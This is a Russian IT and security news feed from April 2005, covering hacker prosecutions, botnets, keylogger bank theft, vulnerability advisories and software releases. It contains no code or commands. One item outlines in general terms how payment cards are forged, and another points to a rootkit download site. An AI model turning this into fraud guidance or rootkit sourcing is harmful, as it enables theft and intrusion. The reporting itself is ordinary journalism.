Судья Северного округа Калифорнии объявил, что 21-летний хакер Роберт Литтл (Robert Lyttle) признан виновным в незаконном вторжении в правительственные компьютеры и изменении материалов на государственных веб-сайтах. Литтла обвинили в том, что, действуя в составе хакерской группы, называющей себя The Deceptive Duo, он произвел незаконное вторжение в компьютерные системы информационной службы управлений логистики (Logistic Information Service) и здравоохранения (Office of Health Affairs) Министерства обороны США, а также исследовательского центра NASА им. Эймса. Литтл признал себя виновным по каждому из пяти предъявленных пунктов обвинения. Максимальное установленное законом наказание за взлом веб-сайта Управления здравоохранения — заключение на 10 лет и штраф $250 тыс. плюс возмещение ущерба; за вторжение в компьютеры информационной службы управления логистики — заключение на 5 лет и штраф $250 тыс. плюс возмещение ущерба; за повреждение сайта Исследовательского центра NASA — заключение на 1 год и штраф $100 тыс. плюс возмещение ущерба. Дело еще находится на стадии рассмотрения. Окончательный приговор хакеру будет оглашен в Окленде 24 июня 2005 года, сообщил Computer Crime Research Center.
CNews

23/04/2005 10:51 МВД следит за террористами в интернете
Глава МВД России Рашид Нургалиев, выступая в четверг в Минске, заявил, что его ведомство "осуществляет системный мониторинг" 185 интернет-сайтов "для выявления сведений о деятельности организаций террористической направленности". Веб-сообщество не слишком этим озабочено. Министр не уточнил, как давно ведется подобное наблюдение, каковы критерии отнесения интернет-ресурсов к подозрительным и какие меры могут быть приняты к их владельцам. Более подробных комментариев по этому вопросу в МВД bbcrussian.com получить не удалось. Однако интернет-сообщество, похоже, не слишком озабочено такими действиями милиционеров во всемирной паутине. Известный деятель Рунета, главный редактор интернет-проекта "Mosnews.com" Антон Носик заявил bbcrussian.com, что в службе мониторинга МВД "сидят очень осмысленные люди, которые очень много информации добывают из интернета - не только эту". Соответствующие службы МВД "добывают в сети ту информацию, которая их интересует", - считает он. По мнению Носика, такая деятельность МВД не представляет угрозы свободе, привычной для веб-сообщества. "Если бы они эти ресурсы [по мнению МВД - террористической направленности] закрывали, то это была бы другая история. Они на них смотрят - и пусть смотрят", - резюмировал он.
BBC

23/04/2005 10:38 Некоторые способы совершения преступлений с использованием банковских платежных карт
Мошенничество с поддельными ПК характеризуется частичной или полной подделкой ПК. Под измененными подлинными ПК подразумеваются ПК, изготовленные на имеющих соответствующее разрешение фабриках, но содержащие информацию о держателе карточки, отличную от той, которая содержалась в первоначально выпущенной ПК. Частичная подделка ПК совершается на основе использования подлинной ПК. Механизм мошенничества может быть различным: мошенник получает в банке обычную ПК в законном порядке, вносит на специальный карточный счет (СКС) минимально необходимую сумму. После этого (или до этого) он добывает необходимую информацию о держателе ПК этой же компании, но с более солидным счетом, и вносит полученные таким образом новые данные в свою ПК. Для реализации такого способа мошенничества преступник должен добыть информацию о кодовых номерах, фамилии, имени, отчестве владельца ПК, об образце подписи и т.д.
Осуществить такую подделку можно по-разному:
* изменив информацию, имеющуюся на магнитном носителе;
* изменив информацию, эмбоссированную (выдавленную) на лицевой стороне;
* проделав и то, и другое;
* подделав подпись законного держателя карточки.
Более подробно о способах подделки банковских карт рассказывается на сайте Crime-Research.Ru в статье Михаила Вертузаева и Александра Юрченко.
Cтатья

23/04/2005 10:26 Евросоюз берет под контроль борьбу с киберугрозами
Европейский союз учредил организацию, которая будет изучать деятельность 25 стран-участниц ЕС в области борьбы с киберугрозами, сообщает IDG News Service. Новая организация будет действовать в рамках проекта по исследованию информационной инфраструктуры ЕС (CI2RCO). «Мы хотим объединить усилия экспертов Евросоюза, узнать больше об их программах и выяснить, как мы можем сотрудничать по части решения глобальной проблемы. Мы также намерены сотрудничать с экспертами из-за пределов ЕС, в особенности, с американцами, канадцами и даже, возможно, россиянами», — рассказал директор института Фраунгофера по обеспечению безопасности информационных технологий (SIT) Пауль Фриссем (Paul Friessem). Одна из проблем, с которыми предстоит столкнуться новой организации — убедить некоторые страны ЕС в необходимости поделиться информацией, которые их правительства считают критичной для национальной безопасности. «Большинство членов ЕС осведомлены об угрозе кибератак против своей инфраструктуры и потому готовы дать информацию, в то же время есть те, кто этого делать не желает. Мы надеемся преодолеть эти барьеры», — отметил Фриссем. Помимо контроля над исследовательской работой в области информационной безопасности на территории ЕС новая организация будет изучать мнения ведущих игроков отрасли — телекоммуникационных, энергетических компаний и других аналогичных предприятий. Итоговая цель работы организации — представить обзор ситуации с информационной безопасностью Еврокомиссии в течение нескольких следующих месяцев. В случае необходимости Еврокомиссия направит этот обзор на рассмотрение учредителей предстоящей 7-й структурной программы. Программа рассчитана на 5 лет и финансируется ЕС. Проект CI2RCO будет действовать два года. Помимо SIT в работе новой организации примут участие Германский аэрокосмический центр, Национальное агентство Италии по новым технологиям и ряд других европейских организаций. В ближайшие месяцы организация по контролю за обеспечением информационной безопасности в ЕС откроет свой сайт.
Источник

23/04/2005 09:55 Китай оккупировала армия зомби
Стремительное развитие интернета в Китае имеет и свои отрицательные стороны. С ростом количества людей, подключенных к интернету, все больше компьютеров становятся «зомби» — машинами, которыми хакеры могу управлять дистанционно. Сайт NWFusion напоминает, что компьютер становится зомби, когда на него попадает вирус. Вирус может скачивать на компьютер самые разные утилиты и обеспечивать беспрепятственный доступ на компьютер злоумышленнику. Как сообщает компания CipherTrust, в мире ежедневно обнаруживается порядка 157 тысяч компьютеров-зомби, и 20% из них находятся в Китае. В отчете компании также сообщается, что доля спама, идущего из США, с июня 2004 года сократилась с 86% до 57%. Очевидно, что хакерская активность переносится в Китай, откуда в самое ближайшее время и будет исходить основная информационная угроза.
"Вебпланета"

23/04/2005 09:43 На Кипре изловили хакера-вуайериста
Вот, казалось бы, взрослый 45-летний мужик – компьютерщик! – а шпионит за 17-летними девушками. Шантажирует их. Какая гадость... Интересно, как он это делал? Кипрская полиция арестовала на днях 45-летнего "компьютерного специалиста", заподозренного в незаконном подглядывании за несовершеннолетней девушкой. Неизвестный герой шпионил за своей жертвой, подсадив на ее компьютер троянскую программу, передававшую в сеть изображение, фиксируемое обычной веб-камерой. По словам жертвы, вуайерист-любитель заснял ее "в момент, когда она была одна в своей спальне", и пригрозил выложить полученный материал в интернете, если она не попозирует ему обнаженной, стоя перед этой самой веб-камерой. Девушка, как сообщает The Register, взвесила шансы и предпочла обратиться в полицию, которая и вывела гада на чистую воду. Компания Sophos, отмечающая значительный рост количества ежедневно фиксируемых троянских программ, рекомендует пользователям защищать свои компьютеры от вторжения с помощью персональных брандмауэров и антивирусных программ. Кроме того, было бы правильно выдергивать USB-кабель веб-камеры в часы, когда она не используется. Ну, или хоть повернуть ее куда-нибудь в угол, дабы не искушать неизвестных доброжелателей.
Internet.Ru

23/04/2005 09:23 Аналитики Gartner предсказывают войну между Magneto и Symbian
Аналитики компании Gartner Group предсказывают появление больших проблем у Symbian, когда компания Microsoft выпустит Magneto (кодовое название для Windows Mobile 2005).Предполагается, что Symbian потеряет лидерство в области операционных систем для смартфонов, когда состоится официальный выпуск Magneto. По мнению аналитиков, новая версия Windows for Smartphones будет эффективно справляться с недостатками текущей версии. Фактически это означает, что разница между двумя операционными системами сведётся в основном к разнице в маркетинговой политике конкурирующих компаний, а это область, где Microsoft признанный лидер. Маркетологи из Рэдмонда представят свой продукт как очевидный выбор для корпоративного использования. Как поведут себя маркетологи Symbian Ltd. в этой ситуации предсказать сложно.
Mobile-Review

23/04/2005 09:17 У нового Папы Римского увели домен
Домен с именем нового Папы Римского Бенедикта XVI (Papst-Benedikt.de), немца по происхождению, зарегистрирован не на Ватикан, а на 35-летнего владельца одной из фитнес-студий в Мюнхене. Как пишет немецкий журнал Spiegel, Стефан Ахац (Stefan Achatz) зарегистрировал этот домен в воскресенье, за два дня до избрания нового понтифика. На сайте предприниматель излагает свой взгляд на то, почему главу католической церкви должны были назвать именно Бенедиктом. Имя Иоанн Павел III отпадает из-за неизбежного сравнения с "уже почти причисленным к лику святых" предшественником, то же самое относится и к одиночным именам Иоанн XXIV или Павел VII, считает баварец. Имя Пий XIII было бы не совсем корректным из-за неоднозначной позиции Пия XII во время нацистского режима. В то же время Бенедикт XV вошел в историю во время Второй мировой войны как Папа-миротворец, и сравнение с ним "в наши времена терактов и религиозных войн" было бы положительным фактором, написал на своем сайте Ахац. Теологического образования у предпринимателя нет, а из католической церковной общины он вышел несколько лет назад, пишет журнал. Предположения владельца фитнес-студии подтвердились во вторник, когда конклав кардиналов выбрал нового Папу Римского. Им стал 78-летний немецкий кардинал Йозеф Ратцингер, принявший имя Бенедикта XVI. В настоящее время Ахац ведет переговоры с некоторыми издательствами, которые хотят получить права на принадлежащий ему домен, отмечает Spiegel.
Lenta.Ru

22/04/2005 17:04 Хакеры ограбили банк при помощи устройств за 20 фунтов
Хакеры, атаковавшие в марте лондонское отделение японского банка Sumitomo Mitsui, использовали для считывания логов клавиатуры устройства стоимостью 20 фунтов стерлингов, сообщает сайт vnunet.com со ссылкой на участников расследования. Выяснилось, что основным орудием преступления, в результате которого из банка могли исчезнуть 220 миллионов фунтов, были компактные приборы, подсоединенные к USB-портам банковских компьютеров. Участники расследования предполагают, что подключить устройства к банковским компьютерам могли лица из числа обслуживающего персонала, например, уборщицы. Уже после того, как вся преступная схема была раскрыта, устройства для считывания логов были обнаружены в ряде банковских компьютеров. Приборы, использованные преступниками, можно купить за 20 фунтов в так называемом шпионском магазине, продающем спецтехнику. Самый верный способ обнаружить подобные устройства — тщательно изучить заднюю поверхность компьютера. Чтобы защитить себя от использования подобных приборов, многие банки отказываются от беспроводных клавиатур. Банк Sumitomo Mitsui для контроля над состоянием своих сетей установил специальное программное обеспечение, которое замеряет напряжение в компьютерных системах. По изменению напряжения можно выявить присутствие в системе посторонних устройств.
VirusList

22/04/2005 16:13 Borland открывает исходные коды JBuilder
Компания Borland Software сегодня открыла исходные коды своей популярной среды для Java-разработчиков — Borland JBuilder. Исходники доступны в рамках открытого проекта Eclipse. Компания надеется существенно улучшить свой продукт и сделать его более привлекательным для разработчиков. По словам пресс-службы, разработчики открытого программного обеспечения могли бы улучшить и расширить механизмы API-функций и внедрить в программу множество усовершенствований. Выступая вчера перед аналитиками с Wall Street, исполнительный директор Borland Дейв Фуллер (Dale Fuller) обратил особое внимание общественности на то, что Borland продолжит работу над продуктом и со своей стороны. Все подробности, относительно процедуры открытия кодов компания обнародует в течении следующих нескольких недель, на данный момент детали не известны. По мнению сообщества open-source, решение компании не стало для них неожиданностью. Они полагают, что данный шаг продиктован рыночными соображениями, после того как JBuilder стал стремительно терять популярность среди программистов, пропустив вперед себя среду WebSphere от IBM.
Источник

22/04/2005 15:59 Биллинговая система NetUP UTM 5.0 на Linux LiveCD
Компания NetUP представила новую разработку — NetUP Linux Live CD. Продукт основан на Knoppix LiveCD (который, в свою очередь, на Debian GNU/Linux) и представляет собой полнофункциональный Интернет-сервер, разворачивающийся за несколько минут на любой платформе: от ноутбука до мультипроцессорной архитектуры. Одним из замечательных качеств NetUP Linux Live CD является то, что в его составе поставляется настроенная на предоставление IP-телефонии, Dual UP, VPN и других услуг сертифицированная в Министерстве Связи РФ биллинговая система NetUP UTM версии 5.0, ограниченная по количеству пользователей (имеется возможность разблокировать ограничение, заключив договор на поставку UTM).
Сайт производителя

22/04/2005 15:02 Уязвимость в CVS
Сообщается о наличии уязвимости в популярном в мире открытых систем ПО CVS (система отслеживания версий), которая позволяет удаленному пользователю вызвать DoS, либо выполнить произвольный код в системе. Также сообщается, что удаленный авторизованный пользователь с привилегиями на подтверждение может с помощью некорректно настроенного Perl сценария выполнить произвольный код на целевой системе. О подробностях уязвимостей не сообщается. Выпущена обновлённая версия 1.11.20.
Подробности

22/04/2005 14:39 Стив Джобс: "Longhorn скопирована с Mac OS"
Как сообщает MacWorld, глава компании Apple Стив Джобс на ежегодном собрании акционеров весьма категорично отозвался о корпорации Microsoft и ее будущей операционной системе Windows под кодовым названием Longhorn. По словам Джобса, софтверный гигант "бесстыдно копирует" разработки Apple, реализованные в Mac OS Tiger. Программная платформа Mac OS Tiger должна поступить в продажу 29 апреля. По утверждениям разработчиков, в этой операционной системе будет порядка двухсот нововведений, в том числе средства поиска данных на персональном компьютере Spotlight, инструментальная панель Dashboard, средство для автоматического выполнения рутинных операций Automator и новая версия программы iChat. Операционная система Windows Longhorn также будет кардинально отличаться от современных версий Windows, правда, ее презентация состоится не ранее середины следующего года. "Они даже копировать не могут быстро", - заметил Джобс по поводу даты выхода новой ОС Microsoft. Несмотря на то, что конкретных примеров "плагиата" Джобс не привел, можно предположить, что речь идет о вышеупомянутом средстве Spotlight и панели Dashboard. Дело в том, что софтверный гигант собирается встроить в Longhorn систему поиска, характерные черты которой напоминают особенности Spotlight. Что касается Dashboard, то она в некотором смысле аналогична системной панели на панели задач Windows. В Tiger также встроена возможность организации файлов в виртуальные папки по каким-либо признакам - авторству, типу, дате создания и т.п. Причем аналогичные средства появятся и в почтовом клиенте Mail. Примечательно, что функции группировки по отправителю, теме и другим признакам Microsoft встроила еще в Outlook 2003. Так что в данном случае можно говорить о "плагиате" как раз со стороны Apple.
"Компьюлента"

22/04/2005 13:45 Очередная критическая дыра в медиаплеерах Real Networks
В программных медиаплеерах Real Networks обнаружена очередная брешь. На этот раз проблема связана с некорректной обработкой файлов в формате RAM. Сценарий атаки сводится к следующему. Злоумышленнику необходимо создать специальный RAM-файл и вынудить жертву открыть его посредством уязвимого приложения. Такой файл, например, может быть размещен на веб-сайте в интернете или отправлен по электронной почте. После запуска файла пользователем на компьютере возникает ошибка переполнения буфера, провоцирующая последующее выполнение произвольного вредоносного кода. Датская компания Secunia присвоила дыре рейтинг высоко критичной. Уязвимость присутствует в программных плеерах RealPlayer 8/10.х, RealPlayer Enterprise, RealOne Player v1/2 и Helix Player. Пользователи операционных систем Microsoft Windows и Apple Mac OS могут загрузить соответствующие обновления посредством функции Check for Update в меню вышеперечисленных приложений. В случае с Linux необходимо посетить веб-сайт компании Real Networks и скачать заплатки вручную.
Подробности

22/04/2005 12:13 Торвальдс предложил собственную систему управления проектом Linux
После спора, который заставил основателя и лидера движения Linux Линуса Торвальдса отказаться от предыдущей системы управления своим проектом, он предложил для этой цели новый инструмент Git. В этом месяце Торвальдс перестал пользоваться системой BitKeeper, возвратившись к старому, более медленному методу простой рассылки обновлений сотням программистов, участвующих в проекте, по e-mail. Однако переход на Git означает, что у проекта Linux вновь будет автоматизированный механизм управления потоком обновлений и отслеживания изменений. В 2002 году Торвальдс принял BitKeeper, проприетарное ПО, которое разработала и продает компания BitMover из Сан-Франциско. Он хвалил этот продукт за повышение производительности труда Linux-программистов, но другие почти сразу же начали возражать против использования проприетарного ПО. Более серьезное препятствие возникло в этом году с противоположной стороны. Основателю BitMover Ларри Маквою не понравились попытки сообщества open source копировать BitKeeper — в частности, он пожаловался на работу коллеги Торвальдса по Open Source Development Labs Эндрю Триджелла, который занимался BitKeeper-совместимым проектом SourcePuller. Проект Торвальдса Git, напротив, не претендует на совместимость с BitKeeper. Это означает, что переходить на новую систему будет труднее, зато не предвидится никаких трений с Маквоем. «Мне нужно что-нибудь, что позволит мне быстро работать, — пишет Торвальдс в e-mail. — Я абсолютно уверен, что мне удалось сделать вещь, которая во многих отношениях проигрывает, но которой достаточно для моих нужд и которую я смог сделать быстрее, чем можно было бы адаптировать существующие SCMs (source code management tools) для использования в большом и распределенном проекте, подобном проекту ядра».
Более подробно

22/04/2005 11:41 Спамеры ушли в пиринговые сети
Информацию об электронных адресах спамеры получают в файлообменных сетях. Такой вывод содержится в исследовании, проведенном компанией Blue Security, сообщает ВВС. Blue Security зарегистрировала в пиринговой сети Gnutella 500 компьютеров, у фальшивых пользователей были записаны файлы с электронными адресами. Через три дня каждый из них был скачан в среднем по 25 раз, на адреса пришли более 700 писем. При этом спам отсылался из разных источников, что позволило исследователям предположить, что спамеры продают друг другу информацию. Кроме того, сотрудники Blue Security попытались самостоятельно найти в пиринговых сетях базы данных с электронными адресами. Это оказалось довольно просто. В распоряжении программистов Blue Security оказались файлы с адресами профессоров университетов, сторонников браков среди гомосексуалистов и полные списки покупателей интернет-магазинов. Основатель и глава Blue Security Эран Решеф (Eran Reshef) говорит, что многие участники файлообменных сетей никак не ограничивают использование своих машин другими пользователям, любой желающий может скачать у них все, что пожелает. Спамерам не нужно делать ничего сложного, лишь дождаться, когда в пиринговой системе появится новичок, и забрать у него адресную книгу. При этом злоумышленники используют стандартные механизмы поиска. Жертвами спамеров могут становиться и пользователи со стажем, у которых настройки на компьютере запрещают скачивать адресные книги, уверен Решеф.
Источник

22/04/2005 10:04 Работа с электронной почтой снижает IQ сильнее марихуаны
При чтении спама мозг человека погружается в сон. Ничего подобного не наблюдается даже во время курения марихуаны, сообщает Sky News. Исследование было проведено физиотерапевтом Гленном Вилсоном (Glenn Wilson) из Королевского колледжа при Лондонском университете (King's College London University). В его эксперименте участвовали 80 человек, за которыми он вел ежедневное наблюдение. Он обнаружил, что коэффициент интеллекта (IQ) людей снижался на 10 пунктов, если они пытались прочитать слишком большое количество сообщений, пришедших на их электронный адрес. То же самое наблюдалось в тех случаях, когда подопытным приходилось отвечать на шквал телефонных звонков или читать слишком много текстов. Столь низкая активность мозга наблюдается при пробуждении человека ото сна. Даже после курения марихуаны IQ падает только на четыре пункта. Снижение мозговой активности проявляется в том, что люди начинают чувствовать себя уставшими и вялыми. "Этот феномен действительно существует", - говорит Вилсон. По его словам, мозг "разрушает" страстное желание просмотреть все сообщения.
Подробности

20/04/2005 10:55 Очередная брешь в Windows 2000
По информации GreyMagic Security, обнаружена очередная брешь в безопасности Windows 2000, позволяющая выполнить произвольный код в системе. Выбор файла в проводнике (внимание - всего лишь выбор, а не открытие!), благодаря уязвимости, найденной в модуле webvw.dll, может привести к выполнению кода. Несмотря на то, что уязвимость связана со скриптами, можно выполнить все действия, разрешенные юзеру, от имени которого запущен проводник. MS пока еще не выпустила патч; пока, в качестве временной меры рекомендуется в настройках проводника устанавливать "классический вид" просмотра папок.
Подробности: - www.greymagic.com/security/...

20/04/2005 10:53 Китайский суд посадил двух американцев за пиратство
Суд в Шанхае приговорил двух граждан США к тюремному заключению за торговлю через Интернет DVD-дисками с китайской территории. Как сообщает агентство Associated Press, суд установил 38-летнему американцу Рэндольфу Гутри (Randolph Guthrie) наказание в виде 2 с половиной лет лишения свободы и штрафа в 60500 долларов США, а его сообщнику Абраму Трашу (Abram Thrush) дал год тюрьмы и 1200 долларов штрафа. Оба они обвиняются в нарушении законов об авторских правах, при этом в ходе слушаний с них были сняты более серьезные обвинения в незаконном предпринимательстве. Вместе с американцами были осуждены два помогавших им китайца, один из них получил год тюрьмы и штраф в 1200 долларов, другой - только штраф в 3600 долларов. Следствие установило, что группа продала через Интернет более 180 тысяч контрафактных DVD клиентам в 20 странах, в том числе в США, куда ушло около 20 тысяч дисков. В доме Гутри в Шанхае, а также на арендованном им складе были обнаружены еще 119 тысяч дисков. Отмечается, что в операции по выявлению пиратов принимали участие представители американских властей. Осужденные американцы после отбытия своих сроков подлежат депортации на родину. Они могут подать апелляцию, но об их планах по этому вопросу не сообщается. За судом наблюдали представители американского консульства, которые воздержались от комментариев.
Lenta.Ru

20/04/2005 10:21 Уязвимости в Netscape
Как сообщает Secunia, в браузере Netscape обнаружены 2 уязвимости, существование которых может позволить злоумышленнику провести XSS (cross-site scripting) атаку и потенциально скомпрометировать систему, являющуюся объектом атаки. Обе уязвимости связаны с дополнениями (плагинами) браузера. Обнаружены были Michael Krax и Georgi Guninski. По сообщению Secunia уязвимости присутствуют в версиях до 7.2. Для предотвращения атаки рекомендуется отключить поддержку JavaScript и не устанавливать плагины поиска (search) из непроверенных источников.
Подробности

19/04/2005 15:15 Reuters пало жертвой Kelvir
Червь Kelvir продолжает распространяться, используя различные системы мгновенного обмена сообщениями (IM). Чаще всего он поражает MSN Messenger от Microsoft, однако на этот раз жертвой стало агентство Reuters, использующее корпоративную IM-систему Reuters Messaging. На днях в Reuters были вынуждены временно закрыть IM-систему, чтобы избежать дальнейшего заражения. Распространение червя W32/Kelvir-Re замедлило скорость работы сети. Kelvir атаковал только версию 3.1 программы, поэтому клиенты, которые успели загрузить обновление до 4.0, не пострадали.
CNews

19/04/2005 14:51 Информационное преступление в Нижнем Новгороде
Группа компаний «Сенди» (Нижний Новгород) извещает о том, что сотрудник ОАО «Молочный комбинат „Нижегородский“» совершил информационное преступление. Взломав компьютерную сеть комбината, он скопировал оттуда персональные данные всех сотрудников, в том числе домашние адреса, телефоны и размеры заработной платы, и опубликовал их на одном из сайтов в Интернете. Этот сайт обнаружили сотрудники службы безопасности предприятия, после чего прокуратура установила, кто его автор. Было возбуждено дело об административном правонарушении по статье 2 Федерального закона «Об информации, информатизации и защите информации». Преступник привлечен к административной ответственности.
Источник

19/04/2005 13:19 "Роснет" начала глобальную модернизацию своей сети
Компании Cisco Systems и РТС (торговая марка - "Роснет") приступили к глобальной модернизации сети, которая позволит в ближайшем будущем предоставлять качественно новый набор услуг для клиентов "Роснет". Опорная сеть в Москве будет создана на базе многофункциональных маршрутизаторов Cisco 7609, а высокопроизводительные коммутаторы Catalyst 3750 Metro послужат основой для возведения в Москве и ЦФО высокоскоростной сети доступа. Для организации системы мониторинга работы сети оператора будет внедрен современный программно-аппаратный комплекс Cisco Info Center, призванный повысить надежность сети и сократить время отклика при возникновении проблемы. Обеспечения эффективной защиты информации планируется добиться за счет использования решения Cisco Security на базе PIX, а для организации соединений с сетями других операторов планируется внедрить решение Cisco Voice на базе Softswitch-а Cisco Systems PGW2200. Ориентировочная сумма инвестиций в оборудование составляет около 3 млн. долл.
"Открытые системы"

19/04/2005 12:47 Выход Opera 8.0
Сегодня норвежская компания Opera Software объявила о готовности новой версии браузера Opera 8.0 для Windows и Linux, сообщает "Компьюлента". Версия для Windows подготовлена сразу на четырех языках - английском, немецком, голландском и польском. Остальные локализации появятся в ближайшее время. Пользователям Mac OS пока придётся пользоваться бета-версией "восьмерки". По логике нумерации, новая версия должна была стать "Оперой" 7.60 (в прошлом году выходило несколько бет с таким обозначением). Однако в итоге разработчики решили, что количество и значимость отличий от последней стабильной версии за номером 7.54 слишком велики, и начали новую "модельную линию" уже сейчас. Среди основных изменений - появление в интерфейсе программы специального поля с подробной информацией о степени защищенности веб-сайтов (например, банковских или интернет-магазинов), внедрение новой технологии ERA, позволяющей автоматически подстраивать ширину страницы под разрешение экрана монитора и избегать появления горизонтальной прокрутки, и, конечно, голосовые функции, позволяющие управлять программой с помощью голосовых команд. Кроме того, в "восьмерке" значительно переработан интерфейс браузера и добавлена возможность обработки SVG-графики. По традиции для скачивания доступна бесплатная полнофункциональная версия браузера Opera 8.0, в интерфейс которой встроен рекламный баннер.
Анонс

19/04/2005 11:44 Internet2 приводит медиаиндустрию в ужас
Ассоциация американской звукозаписывающей индустрии (RIAA) подала около четырех сотен судебных исков против американских студентов, которые использовали высокоскоростную сеть Internet2, чтобы скачивать пиратские копии музыки и фильмов. Internet2 пока распространен мало. Подобно обычному интернету лет пятнадцать назад, он объединяет, главным образом, университеты, колледжи и научные учреждения. Его главное отличие - скорость. Чтобы скачать через Internet2 MP3-файл с песней, как правило, требуется не более 20 секунд. Фильмы, на скачивание которых в обычном интернете уходят часы, через Internet2 можно получить за считанные минуты. Неудивительно, что звукозаписывающие лейблы и кинокомпании так переполошились. По словам президента RIAA Кэрри Шерман, музыкальная индустрия "просто не может допустить того, чтобы Internet2 прератился в зону беззакония", где не действуют общие для всех правила. RIAA призвало руководство американских университетов активно содействовать раскрытию личностей нарушителей. Американская кинематографическая ассоциация (MPAA) также планирует преследовать лиц, занимающихся незаконным файлообменом посредством internet2. "Эти иски ясно донесут до этих воров ту мысль, что мы в состоянии вычислить их и привлечь к ответственности ", - объявил Дэн Гликман, президент MPAA.
Источник

18/04/2005 14:48 Symantec предлагает встроенные антишпионские инструменты
В понедельник Symantec представила антишпионское ПО для индивидуальных пользователей в виде тестовой версии набора инструментов, который она в скоро добавит к своему пакету средств интернет-безопасности. Компания выложила на веб-сайт бесплатно загружаемую бета-версию программ для блокировки spyware, окончательная версия которых выйдет где-то до 1 июня. Продукт войдет в летнюю версию Symantec Norton Internet Security AntiSpyware Edition ежегодно обновляемого компанией программного обеспечения компьютерной безопасности. Одной из главных причин, вынудивших компанию предложить общедоступную опытную версию антишпионской технологии, стала попытка Symantec продемонстрировать преимущество своего ПО перед множеством существующих бесплатных инструментов для борьбы со шпионскими программами. Такие программы предлагают многие компании, включая Microsoft, и Symantec хочет доказать, что за ее инструменты стоит платить. Symantec Norton Internet Security AntiSpyware Edition 2005 будет стоить $79,95, или на $10 дороже существующего пакета. Продакт-менеджер Symantec Креиг Лэйн утверждает, что интеграция с другими средствами защиты Norton Internet Security наряду с возможностью блокировать spyware на уровне брандмауэра убедит заказчиков в целесообразности покупки продукта. «Мы могли бы сделать его самостоятельным продуктом, но чтобы полностью защитить компьютер, часто требуется два или три вида программ, — сказал он. — Заказчики говорят нам, что они устали помнить о необходимости выполнить сканирование, и что некоторые шпионские программы все равно проникают сквозь spyware-фильтры других производителей». По словам Лэйна, антишпионская технология Symantec обнаруживает любые программы, которые возвращают данные отправителю, когда те проходят через брандмауэр. Заблаговременно обнаруживая большинство атак, это ПО защищает пользователя лучше программ, которые выявляют угрозы уже после их проникновения в компьютер. «Добавляя антишпионское ПО в интегрированный пакет и эффективно блокируя любое spyware на уровне брандмауэра, мы можем решить сразу несколько проблем, — говорит он. — Потребителю нужно нечто, что по возможности защищало бы его от многих угроз одновременно. Spyware — это как раз та лишняя проблема, от которой мы способны эффективно его избавить».
ZDNet

18/04/2005 13:45 Корпорация Microsoft решила напомнить людям о Windows
В понедельник корпорация Microsoft приступила к одной из наиболее масштабных и дорогостоящих рекламных кампаний за всю историю своего существования, передает АР. Эта рекламная кампания посвящена повышению популярности основного продукта корпорации - операционной системы Windows. Глава рекламного отдела группы потребительского маркетинга корпорации Microsoft Скотт Леннард (Scott Lennard) пояснил, что реклама посвящена не готовящейся новой версии операционной системы (Windows Longhorn, ожидается в конце 2006 года), но операционной системе Windows вообще и, в частности, операционной системе Windows XP, так как именно она является лучшей на сегодняшний день. Леннард отказался сообщить журналистам, сколько будет стоить корпорации масштабная рекламная кампания, которая должна продлиться 15 месяцев, заявив лишь, что это - одна из крупнейших подобных акций за всю историю Microsoft. В ходе рекламной кампании корпорация Microsoft намеревается познакомить общественность с не совсем обычными возможностями, доступными пользователям Windows, например, возможностью создавать музыкальные композиции или изучать астрономию. Леннард пояснил, что сами по себе эти возможности не являются новинками, но далеко не все пользователи операционной системы знают об их существовании.
Подробности

18/04/2005 12:41 Сайт по руткитам cнова доступен
Как сообщил нам один из посетителей, сайт по руткитам holy father'a снова доступен и располагается по адресу hxdef.net.ru . Несмотря на то, что историю раззвонили уже по всем новостным лентам, турки и болгары из SIS Team (atmacasoft) никак не уймутся и упорно досят red-host.com (хостинг, куда переехал сайт по руткитам). Безуспешно. В результате ответных действий залег сайт турков "spyinstructor". Карта досящего ботнета также доступна на hxdef.net.ru.
Сайт руткитов

17/04/2005 17:32 Российские депутаты поверили спамерам
Депутаты Государственной Думы продолжают борьбу со спамом. Пыл народных избранников не остудили даже отрицательные заключения правительства, профильных комитетов Госдумы и экспертов на антиспамовые дополнения к ФЗ «О рекламе». Положения, которые не удалось внести в действующий закон, появились в проекте его новой редакции. Проект федерального закона № 120079–4 «О рекламе», подготовленный еще в конце прошлого года депутатами Волковым, Мединским, Комиссаровым, Драгановым, Медведевым и Кармеевым, содержит новую статью — «Реклама, распространяемая по сетям электросвязи общего пользования». Согласно ей, «распространение рекламы… допускается только при наличии предварительного согласия адресата на получение рекламной информации. При этом реклама признается распространенной без предварительного согласия адресата, если отправитель (рекламораспространитель) не докажет, что такое согласие было получено. Рекламораспространитель обязан немедленно прекратить рассылку рекламных сообщений в адрес лица, обратившемуся к нему с таким требованием». По сравнению с законопроектом «О внесении изменений в Федеральный закон „О рекламе“, Уголовный кодекс Российской Федерации и Кодекс Российской Федерации об административных правонарушениях» формулировка стала более лаконичной, однако все имевшиеся к ней претензии остались на месте. В частности, по-прежнему депутаты понимают под спамом только рекламу и опять предлагают узаконить запрещенный в Европе принцип opt-out. Суть последнего состоит в том, что компаниям дозволено осуществлять рассылки до тех пор, пока получатель нежелательных писем самостоятельно не обратится с просьбой об исключении его из списка адресатов. «У наших законотворцев почему-то существует уверенность, что в ответ на первое же гневное письмо спамер одумается и перестанет безобразничать», — сказал в интервью CNews координатор проекта «АнтиСпам» Евгений Альтовский. Любопытно, что теперь уверенность в добросовестности спамеров разделяет и Валерий Комиссаров, чья подпись стоит под одним из отрицательных заключений на законопроект «О внесении изменений…». Хотя полгода назад, по словам того же Комиссарова, «имелись существенные недостатки, которые в конечном счете привели к тому, что комитет рекомендовал Госдуме отклонить документ».
CNews

17/04/2005 16:21 Госдума: на программу ГЛОНАСС не хватает денег
Недофинансирование программы развертывания навигационной спутниковой группировки ГЛОНАСС за 2002-2005 гг. составляет 2,846 млрд. рублей. Об этом в своем докладе на заседании комитета Госдумы по промышленности, строительству и наукоемким технологиям сообщил, глава Роскосмоса Анатолий Перминов. Из-за недостатка средств не был осуществлен второй запуск трех космических аппаратов ГЛОНАСС в 2003 году, а также второй запуск спутника ГЛОНАСС-К в 2005 году (его перенесли на 2008 год). Кроме того, срок развертывания минимально необходимой группировки из 18 космических аппаратов переносится с 2005 на 2007 год при условии осуществления двух необходимых запусков в 2007 году.
РИА "Новости"

17/04/2005 15:40 Уязвимости во многих реализациях стека TCP/IP
